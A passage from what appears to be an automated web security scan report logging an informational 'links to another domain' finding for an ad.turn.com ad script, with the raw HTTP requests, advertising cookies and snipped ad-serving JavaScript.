r1lAenxNi5AsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676642&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658642845&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658642849&frm=1&adk=2614322350&ga_vid=89410918.1303658643&ga_sid=1303658643&ga_hid=1796920425&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=FfdNBPqTg5Ogeg4Gvt1sD91oc1OvAAIopJH1MfG_EhLnC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rddTOvP6b6gjBcpH_C1SCNpqOOOSUZ6393Jg_uuC6PaOyufpl4r1zJFBSq1N8uZBwmJnJIAhkromTQp5NWh0AmJAoqPsrsARTvM4FL3_F2IyUWnSvjM6YIyaPo076xrJcUMRbqqdnKZE_Rr_uBv1fpYoqTX7HdciFKtDLlrsXGI8WeFEaqmhzc4AexOvlbEc2vBxeaHaPnRGzUGsshYknbHZ76c4pTy1x4tO_Sj_92V_c7n9dBgb-mUQwCsfFjswrIIZPRlERVaGhUKD4I6xui-k8lCKtjWb8L9cUWaU-0UIo8q2otA9JeeRhKkLEFeUQ_RMNQF2iyMUjVL7ttzR-BfUwEHA_EPrShsGu2vVdRNE585cySrnTOh9dMxUw7WE-jbzjFm2F4SROX5XJ58cmC66JFBq_2-XSn1gqAIjLZzdU6477_djhhS3SPkBUOiwXvOlmotVFErHsZ98d0kz-YJqri-pvt5MhqWaQjjpMBxrbDxPEDs1qpDsWDsRvlIeEnz5gKDVPYLbmT4OmR4NPZdtD7k9QAhA1y9lElb1FxLMTTlE9wGHxh1vi4jaKSjW24VcWuh9OwP5WPMPXscRpCIMAUwsBeLeV0CDvZM5QZ6Ftq1YsQUmG14zwsdGjNCmXvH89Ns8YMIodbd9oSQ80dokk7S5ul1zP6BLW5eswwD4eWnSvjM6YIyaPo076xrJcUOxLUO2TMPVjIrqDa0tm-KiBTwJ3Mz3nWcDL3eoMcRG7qSFM-Ia8iW6v4r--R4cQ0tOXuzZZM1HHBzHQCnHDFIT76c4pTy1x4tO_Sj_92V_c2h3ymUN4Kcfp_vUL9n2zWwMihkX8zucrcdwEbmMe-hvJRVE-2eJRtXuJuLGMKv73tIlgifHPMyMYOKyKgjFTLZMNQF2iyMUjVL7ttzR-BfUXXk1Trf8LJnbyKEXEXy4Rs5cySrnTOh9dMxUw7WE-jZwNXri7ovUdLf3Y0d2cR3Mo0lffrMYn7DG3CobkkduYq477_djhhS3SPkBUOiwXvO6Kt9mMt7SwQaRBfvCxoXpri-pvt5MhqWaQjjpMBxrbFAAi6qyCp8bWnTpeqxAQqD-Dto7E8GwAg5Pmqnod8-GD7k9QAhA1y9lElb1FxLMTYR8GJndpgqdetG7Gif1SgdcWuh9OwP5WPMPXscRpCIMi1HTwWt6KUDOBOeqTXHz5bMr71kjDg1X648oQCMr_-pcs6-yUjStQuln63OD6AXuthlJn1ar6k7JMNu1QAN0iG54DqOheKMDeziVqBn8GZyeZoSeZjxWwnMyW93qk8bfadK-MzpgjJo-jTvrGslxQ1Lf8W-KixpiMgaKLVnFYfdM2M4TlfE8-EAAJpHFMIjpod24YCXPiz88Q4FnH7hHkwC363daRWvDMQSggQ0XBJ3vpzilPLXHi079KP_3ZX9z_D3Pnxac4hOmSOizeoBAAmxcqNpbx_qyOHF8bx__m3LXXSqRzn2UVUm82kY9Q_bAWhV-NPCnkoMVp1trM0nzB0w1AXaLIxSNUvu23NH4F9Q13Du5h2ZYkpF0eVjjZLPxzlzJKudM6H10zFTDtYT6Nv7ck4hLa59nrUxBxfvK0jsTiDPqMR2OonD2-THiRk-erjvv92OGFLdI-QFQ6LBe8_DPa6OuqYk9OTYaaVjd1DGuL6m-3kyGpZpCOOkwHGtsbfcmG0fy54O8N3wai-WvMYQPGY_BRfLoJQ-fzCavlZTH05yYchy8iu18YHh3Yjeufsyc4tF_hYWieSe2zh_teVxa6H07A_lY8w9exxGkIgyJaaRHTrwpoz27fIZ1IYrP0_5bgJl8vrWh4S5IofNmvPz02zxgwih1t32hJDzR2iSFfqx4MhvTgtjM3lWSYPHVadK-MzpgjJo-jTvrGslxQ0RcVu8jaTaGeoRXAyPCre50Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4eg47W10Xto39Ckmzrya4h33vpzilPLXHi079KP_3ZX9zDr0_5RCzZyGIrZvmqD0qM4OT5YshiebyZ7gQJS9Y2G7nSV4NcuM8rWRbl8qnNncE-KnYHtDCpxbmzdYonZCReozEk2lFkYL78ePNoyJfDPFQx6yXCg7HucZPwYbGMGquQBLetBIomVzLxRoGxCnj9AuAQa0jxkQqiAZvgO5_1I0StRTQfNp_8TKujPl08Nio3VO03uwsDFLvsKFK97otf3P7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIb58ANfJNPw7PDUJnwvB5dd6Pj4inu1F6wbmUeqF8IzBEKDqi96IV8EJZ5BHYIe6k7CD2J70CjIpgjp325VAAQQdaIpbGH7ED3K8MO0N02HXED1_Q1nKKRzK6-Rem3ynzIZcssxMIxa11vVxs5mT5Uf91F7QAbAskQZLgankz_lEAtsWoRc15hRbwTJ6OpTIfeE9K-EkC4wSG3itwHytKKywH0jEuEtimvw01NpAdll_S12LxBxPSFr3AblTJ7QlhxOn7NpzXjHY_E5lvc4A6NuB7ghG0r9F5ryP8PbOUmNlPE47_4cVrSmIJL5HRi5olIbPfhz06rl7TrRbZu6TgoL4F9VUieGd2NNutj5j2Ykjk_oiZPJQNg7s-IVZj_8x19CUDvtIMl1s27WDYDzDWC_LSD_hITbj4n3NJ1VnSODES7HgOnosb-a6IAhKWZEUXaNYisGujMcHx0-V460jT0WaPFOl7r-G1YurokLRfo7nTkNuS-FBQ8_zqCnhKxdkov0SCCBSsA9JuQotNKJ3eme79-Yk8VnPY0NhpeTxKpkv2hrlh0-3r1iJk9NptV68epA5hgUytkmdmxxZLnHriOqlwIRUgsfIlB6JAryIf1QYW7ABDvcp7PlPgkJSWReqXTf7i8khFNnmzwH7l3uSRIJ9CaGKwVgQZWnfY1DwqN3RpkxZoDBSjtxesSm3Uug3sv9nwUirjHGXOnnQOyMp0rDIgHDbs1vRtyybpwPmOc5yMEuMrTMtlonH_O9JeRPOWP0ZIih2xqCfVz4XEoVm7IJ9GGhR58b-k1cysnOhgQ4XoPFs4VpT53jYjQ1BIgYtT_QesIMpas4UCL7cLQUCYEefF8ZhuDwI6vTYJUDfh7N4eviQPgiUdr4wy3HO5F-m_plXLm1QU_y8eE9lmQCYwznt4hvD-1jgLwfCa--WFUa_x_ig6W75jQfoKoJulCUXe_iyUTY0KihwMRsyHtwNg6X-lTVLUMvMaLLHAZy6qByVfshfmQXD3gCj1g9GfL5GWIfSL8ueQYsJ2aTgwcNjtxIY7OiRH46Py8__ZNIhhU37x5BD07goFgJXPSoi1qO3GYCyHDGFt0zB7oyV5Po_JUlyVJIDWF8ZE3Z5lVCujHjrE_-wqHnoWVM_QmHLTwkEB8etYNKKOHF_ktFST_LIiB; fc=F2nbXY4wwxMQ2-he6VYeifaRRxFr5MeY29EQT3n5PvLWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF2_ICtsxL0KUEYWMLSd-wG8Gn2BjtD6YgIvLsovsrQsM3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; pf=8SLxkLbfsZjR0znsHi3neH4OSvybkQwzidj39osYezeS04H7stKnZdMqlx3yK2bU4q1C_4bU43_azC2tZTPOE5xKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:24:01 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=7AAylrWKIVhNuAs87JxGCRCSJHZeTdXezI0D9NJ6a5PnC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdc2aowGRsmMGOORBHFqq1hrKFGf11GQBCaTryYIy66k1Lbg67H_mFhqYpVt5VVsi2XJoH4cOuvYUlTkCNcoKzYAdgu4XslHdLUJdEdEt_L2OmnSvjM6YIyaPo076xrJcUPDfvc-m12o4eU_X4AfQuhSE27uj29BfS5yq62USuCcbJ2mysphCbCOVHqkVufyR5Q62RM2XV0z6C22WKqfjLo-76c4pTy1x4tO_Sj_92V_c1u4FyfVVkmOuJxKRp8QC6wZPRlERVaGhUKD4I6xui-ki4slcpsV4_YoV0y--m4Qlgor-Q1vFAi894mdTAlxRFNMNQF2iyMUjVL7ttzR-BfUoMtXb3zJ_1CaLbprfO5U_c5cySrnTOh9dMxUw7WE-jYmKgt5cY46b6MV7NBE9VX32urm-ry6jxYchB52pCvRCa477_djhhS3SPkBUOiwXvMuAIvtw3qJsqMTs-t2v5Nbri-pvt5MhqWaQjjpMBxrbAt0Rro9MFn3YcrOkIone7IW8rbiCicnaD0D3xClXaPsqfmiMdLsciWIM4b1u0MpP2jIB4jnOUZJeLhwif9hALNcWuh9OwP5WPMPXscRpCIM0d2lc41wKmughwY_IxPP5_1CU_YfMraxq29_IqADH6GpDjfslrVyDxMBDlIppEJHfWMJvUK7-VYvE81JVloy8WnSvjM6YIyaPo076xrJcUNUnQxjwdFOzx_mxcgiPuIVikZt4xeL6nraPEnFmjJxqOFEaqmhzc4AexOvlbEc2vA7d_A9Ex4u8L8MYkk-pHgB76c4pTy1x4tO_Sj_92V_c9h4fr-Htwjt7vJe5LUxNUy8mSFRnxnBUrSsMeG95GDwh2wcMme0iUWoKhBYOnQRKQ-L_G3rtWzZSuOdIZvPJI1MNQF2iyMUjVL7ttzR-BfU4B4b4PkUCiI9UG71RU2rwc5cySrnTOh9dMxUw7WE-jZnT7YN_qit-pppX8ieIZXFopU5ahUpSCMio_EHYBXmY6477_djhhS3SPkBUOiwXvNYG_PBcE7oO-VIGFRvROC4ri-pvt5MhqWaQjjpMBxrbNlkLvW_KEfuZkonGbimE96hFkyin_Ijn54D8ZQYQyeQUojhpX01rVy9-nj4jsvWlPdIPhRkfOZD7Gw1oNE5R6FcWuh9OwP5WPMPXscRpCIMLDk9u2iD_o5joM7tR4nqGZYKnb2z6Y6Pip6mhLX9XQxueA6joXijA3s4lagZ_BmcVsphV8i-n-3ZxgEk_BJbDWckgCGSuiZNCnk1aHQCYkCsf5KZ7TmC1fTidCrYRFhvadK-MzpgjJo-jTvrGslxQ-EBqeQGzurhA-gvboh4M5Oxx6ofeEwTxjyh52LD6j9l2_hjlieDEGkxFdag2l_AobCKXnOxySrfnBwp-yju2vfvpzilPLXHi079KP_3ZX9zeaZpHy6aMq7VGz7_Jh8cAWxcqNpbx_qyOHF8bx__m3JkprymxGzfqpQVRY_xh9IOXa0cOruPGEgoAV_0V4_lPkw1AXaLIxSNUvu23NH4F9SIMWdPUA27wTLqw9R0LRHQzlzJKudM6H10zFTDtYT6NgxdRhxIarGlQtPJ5QaPO04WLTfTrJHnA8Zv068h-z8Lrjvv92OGFLdI-QFQ6LBe8yeo6tDpPXwU4mq4aA_aVNGuL6m-3kyGpZpCOOkwHGtsRQIvmbwcEjsACQqy7s1Ma_6XUxNWV_x3y1Dgbw7ZdDlD3XZ60zEd7PscVtFglBi6b1WGV6iwg7NH-zR6O9-wzFxa6H07A_lY8w9exxGkIgx14szYCYWLc51KkoWrhNpwX44MqLQrS2FC2KyGUGLUzMmgfhw669hSVOQI1ygrNgAwxC92_0OE1lATj_Bzvmr4adK-MzpgjJo-jTvrGslxQ0RcVu8jaTaGeoRXAyPCre50Ap9gnzkFEVb7fs7kVfWDThC1pGjTZZuhHGHA3E_QQXxkg2yxfEHKDos_Bqq8NfIsW8wMgGAV6CfA1krWoLQe4kzxLtSTmVijNow7L7wGVRmewd1PfUpL13yozkEZMCBZq2ojIysf__pACQPz6WjyY07u7-PrMFII43SAOmNYvdhEaPSmFtlLGE04IfCzZxTt9sNlFJRvvu5P5sXJ2NUDySPq9u1JKEzFdNesEpAt9OF7usBCtaBxEYdWOPP-OIgtmFUaNljpvX9JR1I3grJnonJr7gSbbdqVK6A62RZ5pnP7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIY0YdZfR1C53YFS4UzCpVao4M6lACg9Ka1lBdWnIoikcWtuyxBrsYt7ZfQAzB8ixJqAO1sOJhbO-SqsIs2Wu9uCjjD-5cBltBFh_O44g1lsAwz2oy4wXv4qwpeSTirO4AcukFMN9RReoOEB7Wu6-f8vCrtdyALUf3pKI5_oaRw1_YeuOiNzeltRzaV0mWOzDENncluAnHU3sm63nq7JK5gWOXtbf7_p74l-7BEJAPDwzLo0cjlfh7C2Un6uUH4prsq6v1w_UD8Qa5i0CGZnvhMXZXyE2q_UBepiqWhIyCn03x5Z_BlBDTOYdoecN60JnDzzVk5IX_z-_KLcMA_1rudCgjp6xR70I1SCg42p6vdEkPMQyyuEse00OvHPc4vrQBn-zrn5Lgk0bkTnpqZz-Al4AdkuP0HWAtc-MYJLZEZPqRnY5HS0QoeCPldzgCvr1buzTCOuX5XqCH1hNy-cmLuVBz-iSxOnimAuuDzjOpt2Kl6xSfGeVUxVOuTAhOYMMeA91xIRi7QUeERAsKntEwAO0GfjoaPY7h0TIk56bkZCW8y6QbdvI6rXNRaaOcqAZDo69WFsxOosvLmDqhzVI6Eqj_dU0CZohAUv9oDGcJ_SZsOPuAneoSNG5kjdB6SR_MpfzDPjmR9qzeF4GCCLPELxoZN695X9iYg1HTTxWdZRDsLr3P-a0KneKIkmwz5s6-w9AZ38CgWbIB0GiMhlXsPumrkaSoPlhB7OWNmG5aV91Zm6zDXPfSfQDSoI6OS6NVAkTz3ZUNeJEg2uSSekJ1k2n-P6TqgmXuEciRaxrYAP6TCUA2MXoPTjePaQNt875Vv8DCDF9Saq_bnp_0UGEXPgLIkFmf1Eg0wpNDcjtIPgi-lUIKLlBB6ILAAn2a2yFtcJcCahrKlkgqAMraJmNQwQe4P1GfDKoPparhunLiZ2P8PfW0gVI-Qm1POSNc6Q-X9xslAlkOrYMBKXvDZAPLZBiZ0-2cfH2Y2xBjvsWUgxZMu2GIvdrPGL1y4a1oSe6x5ERFyW0sJk3_Ryj-eV6osGBMeiNGMhECHy8WL4qabg8xYEZQyFfaf-jCbsg1nzbdhTQaGxLXcDh_3tZBPVKzviQlTCk98i0VL5weMeS043otIq17_yxETqA3oNTLxfYxDKsBLClMr5jQQz_quFBUl; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
Set-Cookie: fc=8GhtwjTuwnVWutbA-MYJRGsmAj2Yvhu-6xuJrYmSSWvWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF7_HZvWoOmTYJsLobWmbE24DvTphMIx4YVn390CgbAR93UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
Set-Cookie: pf=04PuXErPV-GICzzv_vjLB8Z-FqDydq8bkdsK7TsWic6S04H7stKnZdMqlx3yK2bUyKo3hhEaKX7IoPZ-lmhnW5xKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:24:00 GMT
Content-Length: 10889


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N4515.131803.TURN/B5378843.4;sz=160x600;ord=7659056942280430237?;click=http://r.turn.com/r/tpclick/id/nVIdp7VvSmpLCQoABgIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBN9_Aj0C0TYysNIr1lAenxNi5AsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4515.131803.TURN/B5378843.4;abr=!ie;sz=160x600;ord=7659056942280430237?;click=http://r.turn.com/r/tpclick/id/nVIdp7VvSmpLCQoABgIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBN9_Aj0C0TYysNIr1lAenxNi5AsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
GiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N4515.131803.TURN/B5378843.4;abr=!ie4;abr=!ie5;sz=160x600;ord=7659056942280430237?">\n<IMG SRC="http://ad.doubleclick.net/ad/N4515.131803.TURN/B5378843.4;abr=!ie4;abr=!ie5;sz=160x600;ord=7659056942280430237?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.51. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919918&ahcid=1089787&bimpd=NjumYd183li1RagKXPHl4zJBSmlLL3Dent3W9hZVSSWjt-lmIjisKXYtk0cxfCoqviBZB05Oxg-86kigsBDEeK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKTX2uj72I9GXI7eeNIzBneeyoFfUm2TbrHwZU0O9LZulgHBzIj8H9loLjUdnhyPRX-OTJHGejGxp7iHLGyOkzKzF3Y56invj3of6PKLgy5fgU2xBm3QHaMdsIoCKhXuXyRKhKXGgpt9ON4nDHaJZDdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_yn9VVK6_rwMQBzZUn9v7xi0hqZ7aZVDHmPPHvw4qFZy1waJQmyFM1l4x-S8oOkTR0WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPeoMfJYxnPXg5QM4qQHcJp-g7NjMOSxqJylcziAJzN-mGX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfrUDDSQf7Ift07aelswxJAioByWRKoQ3oF0AT_2N-Em_gjdkSW0JhvnWXPD46RI-8Pt_T370WDWWY1SqEwEJwbhnBOUR0uKXwLnlzhRcF-z1FwKJb6pfzy6U4b-zmaBhHBA9y0FUzpqtDC0K6uSmpOaAE0HQb-VqGycWmukn0nOb6o408BxR9uazB8jKSDnLvk&acp=TbRMLgAAljwK5X5HHeFjM__szMt_CFh7hqb-ZA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBWUh9Lky0TbysAsf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtxWSydZHAnroC8LWurusL7QCOEiyw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679616&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661616983&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661616985&frm=1&adk=2614322350&ga_vid=713049586.1303661617&ga_sid=1303661617&ga_hid=1858360584&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=xGTej_P6z-AI9EkS7kehzo64ADMMomwi2Kd-7iCHi7_faqaDzVRu9ZiuBStYaftYxEdzmswgsukEeGYUFx4XIAH2_SOXrIDHPTc0gR2ZYb6X4Qp5J-iSAILnbVuT-E5I21TccxBCE2uOguftNs3B8ws3ywwa2wQp8g03EqWK3wVAhuX1MPtZRjyxWXEoNUZouI1SJymtFf-wX5NeM7FxHXVmVcdQcncuBTFXyb0KORpEc8OVkmsGiB-c6iWVn9ldY4HvbSeLOdW26rSDu-z0b7fwESJ4HNhmJtjvBex-YKBTx2Gs4evsrSNgGeVjsyPbKIV4snhX_CzOkMjSybhlnGNgPZ2h5YBD5bTRezNIX0QPq_AuxX-WlX6hyJqKqX-YemNa-3CGw7dg2Xbxl9yyj5Cwx_9n5HvXijm2JlWJms9d0_CLzTvwT1_vWGRBlmkvxylPN4c5ASigyqNvfErAzVlV-xppIAIRU-E6Xxhd0g1qGjdQJTtjVZ9bXK_YQ_BTPIDICSW8WM7xIPHoCZ9csG1HPNJmxjyYHWoZ-RvqO1Rs1rGnUx4NiY1Ie9e-vPNW0aqWOq3NoDPeH7JXM2kAQx3BGIBe1qfIDTYPebZTLrCN01rbeHDjmF8QPmPzndMIKR1gXBTdH5jry0PtoQ1AeADdt5QfyVcVFtWyaY63ycUd8fmIByXYO4W9y75kdG0AQoWhO66D78aQTUGOa-5a4Cio7FFOm5qLlcOlN8m6qAFtBPdeqoht9ByqjYbOh33uXy0WJccNP-WrMuAFt_DN8BNfPFGOyVi1ejMa8Qj-jUBEc8OVkmsGiB-c6iWVn9ldTgC_Ak1kfCX49woOLgln4LfwESJ4HNhmJtjvBex-YKATa5P0J4l6SMPcleXSZUgKXqY2OOrhbbZiMMhusPur2COjD7OO6-cARpkZSLPRSVlz7bxQk2m7nUZTjP940VM0emNa-3CGw7dg2Xbxl9yyj5mGxcpA9K8MPaFMg7vSCd4YjVge061K_CIJwjIVI3mKEUY0gkSIQpBXzynTrJNwCU9CPQRi8ejLhsKBC1EzuyRqGjdQJTtjVZ9bXK_YQ_BT6tvEpcorqvKJSz9XUV5ADG1HPNJmxjyYHWoZ-RvqO1QZtqyYXm7J9l2WVQYgB0ZOuDurPLPnz-YOBYV3SJoqVB3BGIBe1qfIDTYPebZTLrCg213B_3KfWxyuxZwuZ_VIxLF72myMOFxBfRNILksmlRfdf042SkeHr5C6y-qnARS7ydaEWI9YJO4hL2FWVn0A9s0VFk8U9Vbb0LQSoVT9CYOcJtb1C5Njj-_FAA5AdHSft6aE3xtLefF1xo6gp8PomJSZGc715-qiikrpV_I4w8fJY6IePZZI86sLDhdyJrWco8yN0o-GE9yUKm7Izjqldne91Ojn0JeOvIuNOXHOlgIUZEyfLi_7gOz7FaE1JidJi9uyvtzWqsZ0dzmIBWpnQQ0XtSgyP9-pRtjKBA9CwzZBYDqpER8xtNz5vqcBHQJjw1q3jr96MmE73EdnErm3Gt